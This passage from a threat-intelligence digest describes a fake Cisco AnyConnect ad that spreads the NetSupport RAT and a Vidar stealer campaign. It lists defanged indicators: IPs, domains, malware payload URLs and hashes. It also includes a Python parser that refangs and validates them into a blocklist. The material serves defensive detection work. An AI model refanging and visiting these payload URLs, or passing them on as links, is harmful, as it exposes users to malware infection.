Summary: A recent cyber threat involved a malicious Google ad that impersonated a legitimate Cisco AnyConnect download, using the convincingly similar domain anyconnect-secure-client.com, registered shortly before the ad's launch. Attackers exploited the credibility of Technische Universität Dresden to enhance the ad's legitimacy, intending to evade security detection rather than directly deceive victims. Users who clicked the ad were redirected to a fraudulent site mimicking Cisco's brand, leading to a malicious installer for the NetSupport Remote Access Trojan (RAT) that connected to specific external IP addresses, allowing remote access to victims' machines. The attack utilized a PHP script for malware distribution through a compromised WordPress site and included a digitally signed installer, highlighting both effective impersonation tactics and identifiable execution flaws.
Threats: netsupportmanager_rat
Indicators of compromise:
-------------------------
ip: 91[.]222[.]173[.]67
domain: anyconnect-secure-client[.]com, cisco-secure-client[.]com[.]vissnatech[.]com, monagpt[.]com, mtsalesfunnel[.]com
url: https://berrynaturecare[.]com/wp-admin/images/cisco-secure-client-win-5[.]0[.]05040-core-vpn-predeploy-k9[.]exe
hash:
- sha256=78e1e350aa5525669f85e6972150b679d489a3787b6522f278ab40ea978dd65d
email:
Title: Vidar still changes: Variable Payload and more refined clouding for this new wave
Summary: In February 2025, a new campaign involving Vidar malware was detected, employing advanced techniques such as Dynamic Domain Generation Algorithms (DGA) and delayed activation of malicious URLs to distribute an obfuscated JavaScript payload. The campaign generated 136 main domains and strategically delayed the activation of URLs, complicating immediate detection efforts. The malware has evolved to utilize sophisticated processing methods with XOR operations, complicating static analysis, and exhibits variable payloads that may lead to the deployment of additional malware post-infection.
Threats: vidar_stealer
Indicators of compromise:
-------------------------
ip: 45[.]61[.]138[.]200
domain: trailblazerwheels[.]com, travelzgo[.]com, thenoushkashow[.]com, timeforstudio[.]com, tourismheroawards[.]com, thetransformationalgrowthacademy[.]com, trailsofintrigue[.]com, thelittlebigempire[.]com, theserpentschoice[.]com, tmeador[.]com, tk-9[.]com, tomotupedido[.]com, treadpoint[.]com, treasuredcrown[.]com, timothynew[.]com, trillionserver[.]com, trendingbabz[.]com, thrivefulness[.]com, timchapmanforfairfax[.]com, thinkmovefeelwell[.]com, therapeuticpsychology[.]com, thepikeman[.]com, trinitazcap[.]com, tiktauli[.]com, thernrco[.]com, theparentpager[.]com, topcommercialbrokers[.]com, thesolarsheet[.]com, tinkerandtwig[.]com, totaltechnyc[.]com, thumbmarket[.]com, traveltransformslives[.]com, theopulentgems[.]com, therollingsquare[.]com, trapthekiller[.]com, toyland-planet[.]com, tubuz3ubhz222[.]top, thenarcissismnetwork[.]com, thereadingandwritingtutor[.]com, thoughtblob[.]com, torah4today[.]com, themfaagency[.]com, traphousegolf[.]com, thepoochery[.]com, thepolymathicshaman[.]com, tlcmmwave[.]com, trackmytow[.]com, tirionnetbw[.]com, travelinparis[.]com, titanzinterior[.]com, toocleandetails[.]com, theplaybackband[.]com, travelmotivate[.]com, thinkthegift[.]com, tokmanni-finland[.]com, theprosaist[.]com, themachinerybuyers[.]com, tinytreasuredkeepsakes[.]com, tngiants[.]com, thethailandtravelhub[.]com, tommykhoa[.]com, travelonmymind[.]com, traversecityirrigation[.]com, thessalonikiairporttaxi[.]com, timbreblocks[.]com, tokointernet[.]com, trackercardz[.]com, thinkmagicmedia[.]com, tradercompare[.]com, triviasuperxtra[.]com, travelingveteran[.]com, travelseverywhere[.]com, thisisdlsmade[.]com, topfunsports[.]com, tracyslatton[.]com, tigereyegraphics[.]com, trackedpackage[.]com, trinesoulrenewal[.]com, tk9frenchies[.]com, tmkeenlogistics[.]com, transcriptsearcher[.]com, thepluggedinmusician[.]com, tqrecords[.]com, trankvila[.]com, tonireilly[.]com, trappseptic[.]com, thevapeexpress[.]com, tofa7a[.]com, theroyalresonance[.]com, treeservicelapeermi[.]com, 
thelovelysarahnichole[.]com, topdiscountedproducts[.]com, timothyridgefarm[.]com, tiggy123[.]com, torontosegwayrentals[.]com, theylleatforever[.]com, time4showgt[.]com, tiendabarmesa[.]com, topdeckshirts[.]com, traveledcity[.]com, thewildnotions[.]com, thepernateamannarbor[.]com, todayybigbazzarr[.]com, tiendabombasbarnes[.]com, translatinotranslation[.]com, towerhosts[.]com, timecapitalbitbank[.]com, thesacredpathschool[.]com, thetriviaproject[.]com, tipsaplastics[.]com, themagicofplace[.]com, theollivander[.]com, thesnowbee[.]com, triggertrader[.]com, theouttedshaman[.]com, theslightlyfaded[.]com, toptravelflights[.]com, trendykala[.]com, therisereign[.]com, the-tuning-workshop-dealerzone[.]com, tonicunningham[.]com, tonysschlockfest[.]com, transgenderlockerroomaccess[.]com, trainedbuyer[.]com, thisisrandiimas[.]com, thetortemk[.]com, thosegentlemen[.]com, tradeskillpro[.]com, theshopsnearme[.]com, kibcfmgnahkgand[.]top, theprojectboxboard[.]com, thinkpublishers[.]com, theseniorshow[.]com, thezealotbusinessagency[.]com, topvideoslotscasino[.]com, tradespaceapp[.]com, thevitaminscompany[.]com, theproversation[.]com, theplantedguide[.]com, thenootropicsguide[.]com, threat-expert[.]com, thuanart[.]com, thepranichealing[.]com, topbitcoinideas[.]com, thisindiecreator[.]com, three-mongos[.]com, themakeitstore[.]com, tntwocfo[.]com, ffjihcnfkhihlmd[.]top, idioinc[.]com
url: http://ffjihcnfkhihlmd[.]top/1[.]php, https://idioinc[.]com/5t4a[.]js, https://idioinc[.]com/js[.]php
hash:
- sha256=3b98dbb7962739800e54afdd915ba344f4359c369e3ee7693998b986611c476d, sha1=50227db22d2d75b768653a7edfe11061d3c9f416, md5=7ee8a19e94c10ad9fbfb7367ec26378b
email:
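The IoC blocks in this review are defanged (`[.]` for `.`) and mix several indicator types per entry, so before they can be loaded into a blocklist or SIEM watchlist they need to be refanged, typed and sanity-checked (a digest of the wrong length or a malformed address is usually a transcription error, not an indicator). The Python below is an added example, not code from RST Cloud or the page; it parses blocks in the layout used above (the `type: v1, v2` lines and the `- algo=digest, ...` hash continuation lines), validates each value, and flattens the result into a deduplicated watchlist. The sample block is constructed from values in the Vidar entry above; the `hxxp` handling covers a defanging convention this page does not use.

```python
"""Turn the defanged IoC blocks in this report into validated, refanged
indicators ready for a blocklist or SIEM watchlist (added example)."""
import ipaddress
import re
from dataclasses import dataclass, field

# Expected hex-digest lengths; anything else is treated as a transcription error.
HASH_LENGTHS = {"md5": 32, "sha1": 40, "sha256": 64}
HEX_RE = re.compile(r"^[0-9a-f]+$")
DOMAIN_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)*\.[a-z]{2,}$")

# Constructed sample in the report's layout; the values are copied from the
# Vidar entry above, the layout itself is assumed from the page.
SAMPLE_BLOCK = """\
ip: 45[.]61[.]138[.]200
domain: tubuz3ubhz222[.]top, idioinc[.]com
url: http://ffjihcnfkhihlmd[.]top/1[.]php, https://idioinc[.]com/5t4a[.]js
hash:
- sha256=3b98dbb7962739800e54afdd915ba344f4359c369e3ee7693998b986611c476d, sha1=50227db22d2d75b768653a7edfe11061d3c9f416, md5=7ee8a19e94c10ad9fbfb7367ec26378b
email:
"""


@dataclass
class IocSet:
    ips: list = field(default_factory=list)       # (address, port or None)
    domains: list = field(default_factory=list)
    urls: list = field(default_factory=list)
    emails: list = field(default_factory=list)
    hashes: dict = field(default_factory=dict)    # algorithm -> [hex digests]
    rejected: list = field(default_factory=list)  # raw tokens that failed validation


def refang(token: str) -> str:
    """Undo defanging: '[.]' -> '.' (this report's style) and 'hxxp' -> 'http'."""
    token = token.strip().replace("[.]", ".")
    return re.sub(r"^hxxp", "http", token, flags=re.I)


def _add(out: IocSet, kind: str, raw: str) -> None:
    """Validate one refanged token and file it under its indicator type."""
    value = refang(raw)
    if kind == "ip":
        addr, _, port = value.partition(":")   # the report writes ip:port for some entries
        try:
            ipaddress.ip_address(addr)
        except ValueError:
            out.rejected.append(raw)
            return
        out.ips.append((addr, int(port) if port.isdigit() else None))
    elif kind == "domain" and DOMAIN_RE.match(value.lower()):
        out.domains.append(value.lower())
    elif kind == "url" and re.match(r"^https?://", value, re.I):
        out.urls.append(value)
    elif kind == "email" and re.match(r"^[^@\s]+@[^@\s]+\.[a-z]{2,}$", value, re.I):
        out.emails.append(value.lower())
    elif kind == "hash":
        algo, _, digest = value.partition("=")
        algo, digest = algo.lower(), digest.lower()
        if HASH_LENGTHS.get(algo) == len(digest) and HEX_RE.match(digest):
            out.hashes.setdefault(algo, []).append(digest)
        else:
            out.rejected.append(raw)
    else:
        out.rejected.append(raw)


def parse_ioc_block(text: str) -> IocSet:
    """Parse 'type: v1, v2' lines plus '- algo=digest, ...' hash continuation lines."""
    out = IocSet()
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("---") or line.lower().startswith("indicators of compromise"):
            continue
        if line.startswith("- "):               # only the hash section uses bullet continuations
            kind, rest = "hash", line[2:]
        else:
            key, _, rest = line.partition(":")
            kind = key.strip().lower()
        for token in (t.strip() for t in rest.split(",")):
            if token:
                _add(out, kind, token)
    return out


def to_watchlist(iocs: IocSet) -> list:
    """Flatten to deduplicated, sorted exact-match strings."""
    items = {addr for addr, _ in iocs.ips} | set(iocs.domains) | set(iocs.urls) | set(iocs.emails)
    for digests in iocs.hashes.values():
        items.update(digests)
    return sorted(items)


if __name__ == "__main__":
    parsed = parse_ioc_block(SAMPLE_BLOCK)
    for entry in to_watchlist(parsed):
        print(entry)
    print("rejected:", parsed.rejected)
```

Rejected tokens are kept rather than silently dropped so that a transcription error in the feed is visible to whoever reviews the import; URLs containing a literal comma would need a smarter splitter than the one used here.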
This article was generated with the assistance of an artificial intelligence language model, ChatGPT.